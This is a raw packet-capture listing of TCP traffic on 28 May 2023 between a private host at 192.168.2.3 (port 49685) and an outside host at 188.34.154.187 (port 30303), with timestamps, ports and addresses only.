May 28, 2023 10:46:23.310841084 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.310858011 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.310861111 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.310878038 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.310890913 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.310899019 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.310913086 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.310920000 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.310933113 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.310954094 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.310975075 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.310976028 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.310997963 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.311017036 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.311019897 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.311041117 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.311043978 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.311064005 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.311064005 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.311081886 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.311086893 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.311104059 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.311110020 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.311131954 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.311152935 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.311675072 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.311697006 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.311718941 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.311723948 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.311745882 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.311749935 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.311772108 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.311772108 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.311795950 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.311799049 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.311816931 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.311817884 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.311841011 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.311855078 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.311865091 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.311877012 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.311897993 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.311909914 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.311918974 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.311933041 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.311940908 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.311956882 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.311961889 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.311970949 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.311985016 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.311992884 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312012911 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312021017 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312036991 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312041998 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312062979 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312071085 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312084913 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312088013 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312112093 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312131882 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312139988 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312160015 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312180042 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312191010 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312203884 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312208891 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312226057 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312238932 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312246084 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312272072 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312277079 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312289953 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312299967 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312304020 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312319994 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312329054 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312340975 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312350035 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312371969 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312391996 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312421083 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312443018 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312463045 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312469959 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312484026 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312491894 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312505960 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312516928 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312527895 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312541008 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312549114 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312555075 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312572002 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312577963 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312592983 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312601089 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312614918 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312628031 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312640905 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312660933 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312663078 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312705994 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312834978 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312855005 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312886000 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312900066 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312922001 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312941074 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312942028 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312954903 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312966108 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312974930 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.312989950 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.312997103 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.313010931 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.313018084 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.313033104 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.313038111 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.313054085 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.313060999 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.313075066 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.313081980 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.313097000 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.313102007 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.313117981 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.313124895 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.313139915 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.313143969 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.313160896 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.313163042 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.313183069 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.313184023 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.313201904 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.313205957 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.313229084 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.313246012 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.323091030 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.323180914 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.324476004 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.324495077 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.324630976 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.324630976 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.325257063 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.325278044 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.325299025 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.325319052 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.325326920 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.325355053 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.325362921 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.325362921 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.325376034 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.325381041 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.325397968 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.325408936 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.325424910 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.325434923 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.325453043 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.325460911 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.325488091 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.325488091 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.325506926 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.325516939 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.325534105 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.325541973 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.325561047 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.325570107 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.325586081 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.325597048 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.325614929 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.325623989 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.325638056 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.325650930 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.325681925 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.325684071 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.325710058 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.325710058 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.325728893 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.325737000 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.325756073 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.325763941 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.325781107 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.325790882 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.325808048 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.325817108 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.325834990 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.325843096 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.325860977 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.325870037 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.325892925 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.325897932 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.325920105 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.325926065 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.325947046 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.325953007 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.325978041 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.325984955 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.325998068 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.326004028 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.326021910 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.326033115 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.326046944 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.326059103 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.326077938 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.326086044 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.326103926 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.326112032 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.326128006 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.326138973 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.326155901 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.326164961 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.326184034 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.326190948 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.326208115 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.326219082 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.326240063 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.326246023 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.326266050 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.326272964 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.326292992 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.326299906 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.326319933 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.326328039 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.326349020 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.326374054 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.326975107 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327003002 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327028036 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327038050 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327054977 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327055931 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327071905 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327083111 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327100992 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327110052 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327126980 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327138901 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327155113 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327166080 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327184916 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327192068 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327210903 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327219009 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327239037 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327245951 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327265978 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327272892 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327291012 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327300072 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327318907 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327327013 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327347040 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327353954 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327367067 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327379942 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327398062 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327406883 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327431917 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327435017 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327451944 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327461958 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327478886 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327487946 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327512980 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327532053 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327538013 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327548027 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327564955 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327569008 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327589989 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327590942 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327610016 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327619076 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327636003 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327645063 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327661991 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327670097 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327689886 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327697039 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327717066 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327724934 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327742100 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327753067 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327773094 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327779055 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327797890 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327805042 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327826023 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327831030 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327853918 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327857018 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327883005 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327883005 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327899933 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327910900 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327927113 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327936888 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327955008 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327964067 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.327981949 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.327990055 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.328008890 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.328016043 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.328035116 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.328042030 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.328061104 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.328068018 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.328090906 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.328093052 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.328118086 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.328119993 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.328139067 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.328147888 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.328165054 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.328172922 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.328191042 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.328198910 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.328217030 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.328224897 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.328244925 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.328250885 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.328278065 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.328291893 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.328301907 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.328319073 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.328339100 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.328344107 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.328366041 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.328371048 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.328383923 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.328396082 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.328421116 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.328423977 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.328443050 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.328449011 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.328466892 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.328475952 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.328495979 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.328500986 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.328519106 CEST	49685	30303	192.168.2.3	188.34.154.187
